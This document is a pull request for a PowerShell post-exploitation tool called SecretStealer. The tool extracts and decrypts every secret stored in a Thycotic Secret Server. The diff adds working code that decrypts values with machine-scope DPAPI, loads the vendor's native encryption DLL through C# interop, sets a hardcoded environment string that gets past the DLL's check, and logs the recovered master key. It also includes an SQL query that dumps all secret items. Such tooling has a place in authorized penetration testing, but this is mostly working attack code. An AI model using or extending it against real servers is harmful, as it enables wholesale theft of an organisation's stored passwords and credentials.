### PR TITLE
Add support for DPAPI decryption and the new encryption.config format

### DIFF
--- a/SecretStealer.ps1
+++ b/SecretStealer.ps1
@@ -165,6 +165,20 @@ function Local:Get-MasterKeys{
     return @{"key" = Convert-HexStringToByteArray($key); "key256" = Convert-HexStringToByteArray($key256); "iv" = Convert-HexStringToByteArray($iv)}
 }
 
+function Local:DPAPIDecrypt{
+        Param (
+        [Parameter( Position = 0, Mandatory = $True )]
+        [String]
+        $base64blob
+    )
+    Add-Type -AssemblyName System.Security
+    Write-Verbose "Decrypting DPAPI encrypted data..."
+    $decrypted = [Security.Cryptography.ProtectedData]::Unprotect([Convert]::FromBase64String($base64blob), $null, 'LocalMachine')
+    $decstr = [Text.Encoding]::ASCII.GetString($decrypted)
+
+    return $decstr
+}
+
 function Local:Get-DatabaseConnectionString{
     Param (
         [Parameter( Position = 0, Mandatory = $True )]

--- a/SecretStealer.ps1
+++ b/SecretStealer.ps1
@@ -97,7 +97,8 @@ Invoke-SecretStealer -WebRoot 'C:\inetpub\wwwroot\SecretServer\'
     Param (
         [Parameter( Position = 0, Mandatory = $True )]
         [String]
-        $WebRoot
+        $WebRoot,
+        [switch]$NewFormat = $false
     )
 
     if((Get-Item $WebRoot) -is [System.IO.DirectoryInfo]){
@@ -112,7 +113,15 @@ Invoke-SecretStealer -WebRoot 'C:\inetpub\wwwroot\SecretServer\'
     $dbConnectionString = Get-DatabaseConnectionString($DatabaseConfig);
     $dataSet = Invoke-SQL -connectionString $dbConnectionString -sqlCommand "select s.SecretName, f.SecretFieldName, s.[Key], s.IvMEK, i.ItemValue, i.IV from tbSecretItem as i JOIN tbSecret as s ON (s.SecretID = i.SecretID) JOIN tbSecretField as f on (i.SecretFieldID = f.SecretFieldID)";
 
-    $masterKeys = Get-MasterKeys($EncryptionConfig)
+    if ($NewFormat){                    
+        $masterKeys = DecryptNewFormat -webroot $WebRoot
+    }else{
+        $masterKeys = Get-MasterKeys -path $EncryptionConfig
+        if(-not $masterKeys){
+            Write-Host "Failed to decrypt encryption.config, may be using the new format. Try adding -NewFormat flag"
+            return
+        }
+    }
     
     $SecretName = $null;
     $aes = New-Object System.Security.Cryptography.AesCryptoServiceProvider
@@ -140,7 +149,12 @@ function Local:Get-MasterKeys{
         $path
     )
   
-    $master = [Thycotic.ihawu.Business.Config]::DecryptConfig($path)
+    try{
+        $master = [Thycotic.ihawu.Business.Config]::DecryptConfig($path)
+    }
+    catch [System.Runtime.Serialization.SerializationException]{
+        return $false
+    }
 
     foreach($i in $master.Pairs){
         switch($i.key){
@@ -177,6 +191,32 @@ function Local:DPAPIDecrypt{
     $decstr = [Text.Encoding]::ASCII.GetString($decrypted)
 
     return $decstr
+}
+
+function Local:DecryptNewFormat{
+    #Imports the new Thycotic.ihawu.EncryptionProtection_x64.dll and uses it to decrypt the encryption.config file.
+    #Not tested on x86 hosts, there's a seperate dll for that arch.
+    Param (
+        [Parameter( Mandatory = $True )]
+        [String]
+        $webroot
+    )
+    
+    LoadEncryptionDll
+    $keys = [SecretStealer.Loot]::Decrypt($webRoot)
+
+
+    if ($keys.IsEncryptedWithDPAPI -eq "true"){
+        Write-Verbose "Encryption.config values are encrypted with DPAPI, decrypting..."
+        $encryptedValue = $keys.key256
+        $key256val = DPAPIDecrypt -base64blob $encryptedValue
+        
+    }else{
+        $key256val = $keys.key256
+    }
+    Write-Verbose "Got master key: $key256val"
+    return @{"key256" = Convert-HexStringToByteArray($key256val)}
+      
 }
 
 function Local:Get-DatabaseConnectionString{
@@ -336,3 +376,174 @@ function Local:Invoke-SQL {
     
     return $dataSet.Tables
 }
+
+function Local:LoadEncryptionDll{
+
+       $Assem = ( 
+        “System",
+        "System.IO",
+        "System.Reflection",
+        "System.Runtime.Serialization"
+    ) 
+    #drop into C# land and set up our interop
+    $source= @"
+   using System;
+using System.Text;
+using System.Runtime.InteropServices;
+using System.Diagnostics;
+using System.Collections;
+
+namespace SecretStealer
+{
+    public class Loot
+    {
+
+        public static string ByteArrayToString(byte[] ba)
+        {
+            StringBuilder hex = new StringBuilder(ba.Length * 2);
+            foreach (byte b in ba)
+                hex.AppendFormat("{0:x2}", b);
+            return hex.ToString();
+        }
+
+        public static string PtrToString(IntPtr ip, int len)
+        {
+            byte[] ba= new byte[len];
+            Marshal.Copy(ip, ba, 0, len);
+            byte[] keyutf8Bytes = Encoding.Convert(Encoding.Unicode, Encoding.UTF8, ba);
+            return Encoding.Default.GetString(keyutf8Bytes);
+        }
+
+
+        public static Hashtable Decrypt(string wwwroot)
+        {
+                      
+            string target_dll = wwwroot + "\\bin\\Thycotic.ihawu.EncryptionProtection_x64.dll";
+            string confpath = wwwroot + "\\encryption.config";
+            encloader enc1 = new encloader(target_dll);
+
+            //Need this to call into the dll
+            Environment.SetEnvironmentVariable("Thycotic CAC", "5uK10RwTp6tCZQnwVqo5"); 
+
+
+            IntPtr handle = IntPtr.Zero;
+            
+            enc1.LoadConfiguration(confpath, out handle);          
+            if (handle == IntPtr.Zero)
+            {
+                Console.WriteLine("Failed to load config!");
+            }
+
+
+            int paircount;
+            enc1.GetPairCount(handle, out paircount);
+            
+
+            Hashtable valuesT = new Hashtable();
+            for (int i = 0; i < paircount; i++)
+            {
+                IntPtr key;
+                IntPtr val;
+                int length;
+
+
+                //Now get k,v
+  
+                enc1.GetPairKeyByIndex(handle, i, out key, out length);
+                string keyStr = PtrToString(key, length);
+
+                enc1.GetPairValByIndex(handle, i, out val, out length);
+                string valStr = PtrToString(val, length);
+                valuesT.Add(keyStr, valStr);
+                                
+            }
+
+                       
+            return valuesT;
+        }
+    }
+
+
+
+    public class encloader
+    {
+        //Stuff for importing dlls
+        [DllImport("kernel32.dll")]
+        public static extern IntPtr LoadLibrary(string dllToLoad);
+
+        [DllImport("kernel32.dll")]
+        public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName);
+
+        //interop function delegates
+        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
+        public delegate int fn_GetPairCount(IntPtr handle, out int pairCount);
+
+        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
+        public delegate int fn_GetPairKeyByIndex(IntPtr handle, int index, out IntPtr key, out int length);
+
+        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
+        public delegate int fn_GetPairValByIndex(IntPtr handle, int index, out IntPtr val, out int length);
+
+        [UnmanagedFunctionPointer(CallingConvention.Cdecl)]
+        public delegate int fn_LoadConfiguration([MarshalAs(UnmanagedType.LPWStr)] string path, out IntPtr handle);
+
+
+        public fn_GetPairCount l_getPairCount;
+
+        public fn_GetPairKeyByIndex l_getPairKeyByIndex;
+
+        public fn_GetPairValByIndex l_getPairValByIndex;
+
+        public fn_LoadConfiguration l_loadConfiguration;
+
+        private IntPtr handle;
+
+        public encloader(string dll)
+        {
+            handle = LoadLibrary(dll);
+
+            IntPtr addr_loadconfig = GetProcAddress(handle, "LoadConfiguration");
+            IntPtr addr_getpaircount = GetProcAddress(handle, "GetPairCount");
+            IntPtr addr_getpairkeybi = GetProcAddress(handle, "GetPairKeyByIndex");
+            IntPtr addr_getpairvalbi = GetProcAddress(handle, "GetPairValByIndex");
+
+            l_loadConfiguration = (fn_LoadConfiguration)Marshal.GetDelegateForFunctionPointer(addr_loadconfig, typeof(fn_LoadConfiguration));                   
+            l_getPairCount = (fn_GetPairCount)Marshal.GetDelegateForFunctionPointer(addr_getpaircount, typeof(fn_GetPairCount));
+            l_getPairKeyByIndex = (fn_GetPairKeyByIndex)Marshal.GetDelegateForFunctionPointer(addr_getpairkeybi, typeof(fn_GetPairKeyByIndex));
+            l_getPairValByIndex = (fn_GetPairValByIndex)Marshal.GetDelegateForFunctionPointer(addr_getpairvalbi, typeof(fn_GetPairValByIndex));
+                    
+        }
+
+
+        //expose functions for calling
+        public int LoadConfiguration(string path, out IntPtr handle)
+        {
+            return l_loadConfiguration(path, out handle);
+
+        }
+
+        public int GetPairCount(IntPtr handle, out int pairCount)
+        {
+            return l_getPairCount(handle, out pairCount);
+        }
+
+        public int GetPairKeyByIndex(IntPtr handle, int index, out IntPtr key, out int length)
+        {
+            return l_getPairKeyByIndex(handle, index, out key, out length);
+        }
+
+        public int GetPairValByIndex(IntPtr handle, int index, out IntPtr val, out int length)
+        {
+            return l_getPairValByIndex(handle, index, out val, out length);
+        }
+        
+    }
+
+}
+
+"@
+Add-Type -ReferencedAssemblies $Assem -TypeDefinition $Source -Language CSharp 
+
+
+}
+


### PR DESCRIPTION
These changes add support for 

- decrypting DPAPI secrets 
- new (10.4+?) encryption.config file format.

The encryption.config file is now decrypted by `Thycotic.ihawu.EncryptionProtection_x64.dll` (or the x86 version), which are native DLLs. Rather than reversing how the decryption actually works, I've used some C# to call into the native DLL's functions for loading the config and accessing pairs. The only thing preventing this is a hardcoded environment string check in the native DLL, so this is just added to the environment of the managed code.

When DPAPI encryption is enabled the Secret Server encrypts the value of each pair using the Windows DPAPI interface, with the `CRYPTPROTECT_LOCAL_MACHINE` flag, so any process running on the host can decrypt the data.

I don't have a version of SS older than 10.4 to check, but the changes shouldn't  break extraction from the older version. I haven't added DPAPI decryption for older versions but it probably works the same.